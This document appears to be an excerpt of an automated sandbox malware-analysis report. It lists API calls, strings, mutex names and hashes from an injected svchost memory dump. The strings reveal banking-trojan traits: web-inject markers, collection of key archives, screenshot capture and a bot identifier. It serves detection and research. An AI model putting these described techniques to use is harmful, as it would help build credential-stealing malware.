                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C803B7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000020), ref: 02C803D4
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C803DB
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C80504
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8053C
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C8053F
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8054C
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8054F
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(02CBD840,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C8055A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$strstr$Process$AllocCriticalSection$EnterFreeLeaveValidate
                                                                                                                                                                                                                    • String ID: data_after$data_before$data_end$data_inject$set_url
                                                                                                                                                                                                                    • API String ID: 2387113551-2328515424
                                                                                                                                                                                                                    • Opcode ID: c16699b97f3a54a12fc46ee5ca0b546e22a85f7000ea06cbc45ceb26d375bcf5
                                                                                                                                                                                                                    • Instruction ID: 862d923f2d4cfc4ddbe5a02576eeefa2444832840683b132483696eb5dc3c8e8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c16699b97f3a54a12fc46ee5ca0b546e22a85f7000ea06cbc45ceb26d375bcf5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7BA1E2719447419FDB22DF34C8947A6BFE5AF85308F14C6ACD88A8B242EB71D60DCB91
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFCBF), ref: 02C8D284
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D2BE
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8D2C8
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8D2D0
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D2DF
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8D2E6
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFCBF,?,?), ref: 02C8D389
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8D3C3
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8D3CD
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8D3D5
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8D3E4
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8D3EB
                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(?), ref: 02C8D4F2
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Error$LastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Mode
                                                                                                                                                                                                                    • String ID: .txt$.zip$7F1BFCBF$keys$path
                                                                                                                                                                                                                    • API String ID: 3293890905-3130204430
                                                                                                                                                                                                                    • Opcode ID: 4e8c0907a3706a68fe3ef888ca7144b3ee322088e14f14862d275d065ea671d8
                                                                                                                                                                                                                    • Instruction ID: aee6f32301bdcdfa9a6d4cc34bc4f8d0ee578be413322cb3f489d5fcad6d9f42
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e8c0907a3706a68fe3ef888ca7144b3ee322088e14f14862d275d065ea671d8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB81E9315086868FC716DB3894687ABBBE5EFC5349F18CA58E8CAD7241EB31D509C781
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C89C00
                                                                                                                                                                                                                      • Part of subcall function 02C89B20: PathAddBackslashA.SHLWAPI(7F1BFC6B), ref: 02C89B47
                                                                                                                                                                                                                      • Part of subcall function 02C89B20: GetFileAttributesA.KERNEL32(?), ref: 02C89B85
                                                                                                                                                                                                                      • Part of subcall function 02C89B20: PathFileExistsA.SHLWAPI(?), ref: 02C89BC9
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC6B), ref: 02C89C48
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C89CB0
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C89CBD
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC6B,?,?), ref: 02C89CF7
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C89D7A
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02C89D8E
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02C89DA1
                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000), ref: 02C89DD0
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC6B), ref: 02C89DDB
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C89DFE
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C89E01
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C89E0E
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C89E11
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashFileHeap$AttributesFreeProcessVirtual$AllocCurrentDeleteDirectoryExistsValidatelstrcpynmemset
                                                                                                                                                                                                                    • String ID: 5NT$7F1BFC6B$keys.zip$path.txt
                                                                                                                                                                                                                    • API String ID: 2685098104-2792955510
                                                                                                                                                                                                                    • Opcode ID: f19ac0ea75750ce4670e50be6c27497d217c92bb957834dcea19e5a2fbb9cb28
                                                                                                                                                                                                                    • Instruction ID: c06213b1eed9abbb4c11ff5360907248da8ade7d6854d3c723d800ba307d5478
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f19ac0ea75750ce4670e50be6c27497d217c92bb957834dcea19e5a2fbb9cb28
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06517931A406855FDB129B389C98BF6BFE89F81308F1485E5E986DB341EB719948CB50
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • StrStrIW.SHLWAPI(02C7136E,\java\,?,75AF5180,00000000,?,?,02C7136E,?,?), ref: 02C8E959
                                                                                                                                                                                                                    • StrStrIW.SHLWAPI(02C7136E,\windows\,?,?,02C7136E,?,?), ref: 02C8E969
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,02C7136E,000000FF,00000000,00000000,00000000,00000000,?,?,02C7136E,?,?), ref: 02C8E97C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000013,?,?,02C7136E,?,?), ref: 02C8E998
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,02C7136E,?,?), ref: 02C8E99F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8E9AF
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,02C7136E,000000FF,00000000,00000000,00000000,00000000,?,?,02C7136E,?,?), ref: 02C8E9CF
                                                                                                                                                                                                                    • GetShortPathNameA.KERNEL32(00000000,00000000,00000104), ref: 02C8E9E4
                                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(?,?,?,?,02C7136E,?,?), ref: 02C8EA05
                                                                                                                                                                                                                    • ReadFile.KERNEL32 ref: 02C8EA32
                                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,?,75AF5180,00000000,?,?,02C7136E,?,?), ref: 02C8EA8E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C7136E,?,?), ref: 02C8EAA1
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,02C7136E,?,?), ref: 02C8EAA4
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C7136E,?,?), ref: 02C8EAB1
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,02C7136E,?,?), ref: 02C8EAB4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$FileProcess$ByteCharMultiWide$AllocFreeNamePathPointerReadShortSizeValidatememset
                                                                                                                                                                                                                    • String ID: \java\$\windows\$iBKS
                                                                                                                                                                                                                    • API String ID: 3070551764-2513530025
                                                                                                                                                                                                                    • Opcode ID: 262073bbefefa13faee61674ddda304c66a7232f08ba1088c6c5e34d9c5f0139
                                                                                                                                                                                                                    • Instruction ID: ff8bf14a6dcb9fd73a4fdef842a0580c8f30e8ec5885aa7bb6a116afd196ec38
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 262073bbefefa13faee61674ddda304c66a7232f08ba1088c6c5e34d9c5f0139
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5041C471A843616BE721AF259C48FBB7AACFFC4F19F048618F814D71C0EB70DA0586A1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C82160
                                                                                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C821A8
                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,id=,user!226533!1CE3AAD1), ref: 02C821BE
                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 02C821C6
                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,id=,user!226533!1CE3AAD1), ref: 02C821CD
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(02CCBADC,?,00000005,?,id=,user!226533!1CE3AAD1), ref: 02C821EF
                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(02CCBADC,?,id=,user!226533!1CE3AAD1), ref: 02C821F6
                                                                                                                                                                                                                      • Part of subcall function 02C82030: memset.MSVCRT ref: 02C82051
                                                                                                                                                                                                                      • Part of subcall function 02C82030: GetDriveTypeA.KERNEL32(02CCBADC,?,?,?), ref: 02C82068
                                                                                                                                                                                                                      • Part of subcall function 02C82030: SetCurrentDirectoryA.KERNEL32(02CCBADC,?,?,?), ref: 02C82078
                                                                                                                                                                                                                      • Part of subcall function 02C82030: _snprintf.MSVCRT ref: 02C820A5
                                                                                                                                                                                                                      • Part of subcall function 02C82030: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02C820C7
                                                                                                                                                                                                                      • Part of subcall function 02C82030: WriteFile.KERNEL32(00000000,?,00000104,02C82265,00000000,00000000,76229300), ref: 02C820FB
                                                                                                                                                                                                                      • Part of subcall function 02C82030: GetHandleInformation.KERNEL32(00000000,02C82265), ref: 02C82112
                                                                                                                                                                                                                      • Part of subcall function 02C82030: CloseHandle.KERNEL32(00000000), ref: 02C82123
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(02CCBADC,?,00000005,?,id=,user!226533!1CE3AAD1), ref: 02C8223F
                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(02CCBADC,?,id=,user!226533!1CE3AAD1), ref: 02C82246
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Drive$Type$CurrentFileHandleThreadlstrcpynmemset$CloseCreateDirectoryErrorInformationLogicalModePriorityStringsWrite_snprintf
                                                                                                                                                                                                                    • String ID: AppEvents$Console$Control Panel$user!226533!1CE3AAD1$Environment$Identities$Software$System$id=
                                                                                                                                                                                                                    • API String ID: 3198928771-1651316742
                                                                                                                                                                                                                    • Opcode ID: 7f4264227056759e5aa3bc13f166b870f38044dcd9dfb47c7cb8d14f2000768e
                                                                                                                                                                                                                    • Instruction ID: 21637d07351c62209abd453d13aea30da296579d93d7853852444d9999779526
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f4264227056759e5aa3bc13f166b870f38044dcd9dfb47c7cb8d14f2000768e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E31F6B1980294AFD712EFE49C4D79EBB69EF8031CF904698ED08A7140D7704E55CF96
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8B127
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B175
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8B181
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8B185
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B196
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8B19D
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?), ref: 02C8B1D0
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B1DF
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8B1E5
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8B1E9
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B1FA
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8B201
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C8B22F
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000FA0,?), ref: 02C8B245
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                                    • String ID: %s\%02d.bmp$7F1BFC0D$scrs
                                                                                                                                                                                                                    • API String ID: 1455050916-1667420815
                                                                                                                                                                                                                    • Opcode ID: a2d51a5827884aeba548fcc68a2a58e4ab6ff3698e1df2d5993144c738e64f0b
                                                                                                                                                                                                                    • Instruction ID: 1702d08459725db940bfbe12de1844016283b2e0f2e6e241e9736916e4f7f2d0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2d51a5827884aeba548fcc68a2a58e4ab6ff3698e1df2d5993144c738e64f0b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48315B72D402585BCB21DB749C88BEB77A8EF85308F4446D4EA89D7100DF70DA59CBA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bffd6), ref: 02C90147
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C90195
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C901A1
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C901A5
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C901B6
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C901BD
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?), ref: 02C901F0
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C901FF
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C90205
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C90209
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C9021A
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C90221
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C9024F
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000FA0,?), ref: 02C90265
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                                    • String ID: %s\%02d.bmp$7f1bffd6$scrs
                                                                                                                                                                                                                    • API String ID: 1455050916-2518254936
                                                                                                                                                                                                                    • Opcode ID: 487721265e4893e57a4193ffd79a2ec7ca49d1261bb5d937a2dce87be9f48486
                                                                                                                                                                                                                    • Instruction ID: 9288b0c1c4f02724dd8a4a36e7fd7d1f34b3c2ca216c9da405f7a4d7332aa7bc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 487721265e4893e57a4193ffd79a2ec7ca49d1261bb5d937a2dce87be9f48486
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2531F672D402995BDF269B74AC9CBEB77A8AF85300F4446D4EA89D3100DF70DA59CBA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02C8E0CC
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C8E0E2
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02C8E0F0
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8E0F9
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8E117
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8E125
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8DCE0,00000000,00000000,00000000), ref: 02C8E13A
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40), ref: 02C8E14B
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C8E150
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8E164
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8E172
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFD21), ref: 02C8E17D
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7F1BFD21,FAKTURA), ref: 02C8E197
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
                                                                                                                                                                                                                    • String ID: 7F1BFD21$FAKTURA$Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$P0#v
                                                                                                                                                                                                                    • API String ID: 2736094147-4048276756
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02C8FEFC
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C8FF12
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 02C8FF20
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8FF29
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8FF47
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8FF55
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8FC70,00000000,00000000,00000000), ref: 02C8FF6A
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40), ref: 02C8FF7B
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C8FF80
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8FF94
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8FFA2
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFF41), ref: 02C8FFAD
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7F1BFF41,INTER), ref: 02C8FFC7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
                                                                                                                                                                                                                    • String ID: 7F1BFF41$INTER$Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}$P0#v
                                                                                                                                                                                                                    • API String ID: 2736094147-395204026
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C7738C
                                                                                                                                                                                                                    • GetThreadDesktop.USER32(00000000,?,?,02C77262,00000000,00000000), ref: 02C77393
                                                                                                                                                                                                                    • SetThreadDesktop.USER32(00000000,?,?,02C77262,00000000,00000000), ref: 02C7739F
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: GetTickCount.KERNEL32 ref: 02C7CAA8
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAB9
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02CBD6C0), ref: 02C7CAE3
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAFC
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CBD66C), ref: 02C7CB29
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB3C
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: CreateMutexA.KERNEL32(00000000,00000000,02CBD790,?,?,02C77262,00000000,00000000), ref: 02C7CB5A
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB6B
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: CreateMutexA.KERNEL32(00000000,00000000,02CBD750,?,?,02C77262,00000000,00000000), ref: 02C7CB7F
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB98
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBAB
                                                                                                                                                                                                                      • Part of subcall function 02C7CAA0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBBE
                                                                                                                                                                                                                      • Part of subcall function 02C7CBF0: memset.MSVCRT ref: 02C7CC09
                                                                                                                                                                                                                      • Part of subcall function 02C7CBF0: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 02C7CC22
                                                                                                                                                                                                                      • Part of subcall function 02C98320: malloc.MSVCRT ref: 02C98332
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,00000008,00000008), ref: 02C77437
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,00000008,00000005), ref: 02C77445
                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,fuck), ref: 02C7744F
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
